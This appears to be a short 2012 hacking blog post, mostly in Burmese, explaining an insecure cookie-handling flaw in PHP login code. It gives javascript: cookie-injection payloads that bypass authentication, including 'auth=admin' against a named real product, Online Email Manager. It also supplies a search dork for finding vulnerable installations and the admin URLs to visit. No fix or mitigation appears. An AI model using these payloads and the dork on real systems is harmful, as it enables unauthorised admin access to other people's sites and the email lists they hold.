Pages

Thursday, 30 August 2012

Insecure Cookie Handling


Web Server ေတြရဲ႕ Cookie Handle အလြဲကေန admin access ရယူသြားတဲ့ Vuln ျဖစ္ပါ တယ္။
ဥပမာ vuln.php ရဲ႕ Code ကို တစ္ခ်က္ၾကည့္လိုက္ပါ ။
Code

if($_POST['password'] == $thepass) {
setcookie(“is_user_logged”,”1″);
} else { die(“Login failed!”); }
………… etc ……………..
if($_COOKIE['is_user_logged']==”1″)
{ include “admin.php”; else { die(‘not logged’); }

သူ႕မွာ လြဲသြားတဲ့အေၾကာင္းအရာက ”is_user_logged” ဆိုတဲ့ Variable ျဖစ္ပါတယ္ Browser ထဲက Cookie ရွိရင္ Vale 1 အျဖစ္သတ္မွတ္ျပီး Log in အ၀င္ခံလိုက္တဲ့ သေဘာပါ အဲ့ဒီ့မွာပဲ

javascript:document.cookie = “is_user_logged=1; path=/”;

ဆိုျပီး Javascript Inject လုပ္လိုက္ရံုနဲ႕ Log in ၀င္ျပီးသားျဖစ္သြားပါ့မယ္ ။

Online Email Manager မွာ ေပါက္သြားတဲ့ Vuln အေၾကာင္းၾကည့္လုိက္ရင္ ပိုျပီး သေဘာေပါက္သြားမွာပါ ။

DorK : Powered by Online Email Manager

အဲ့ဒီ့မွာ http://www.site.com/demo/OEM/admin/index.php ဆိုပါစို႕ အဲ့ဒီ့မွာ

javascript:document.cookie = “auth=admin; path=/”; လို႕ Javascript Inject လုပ္လိုက္ျပီး emailList.php ( http://www.site.com/demo/OEM/admin/emailList.php ) ကိုသြားလိုက္ရံုနဲ႕ Admin အျဖစ္ Login ၀င္ေနျပီးသားျဖစ္တာ ေတြ႕မွာပါ


Written by Negative Thunder
http://ghostarea.net/

No comments:

Post a Comment

Related Posts Plugin for WordPress, Blogger...

အေထြးေထြးနည္းပညာမ်ား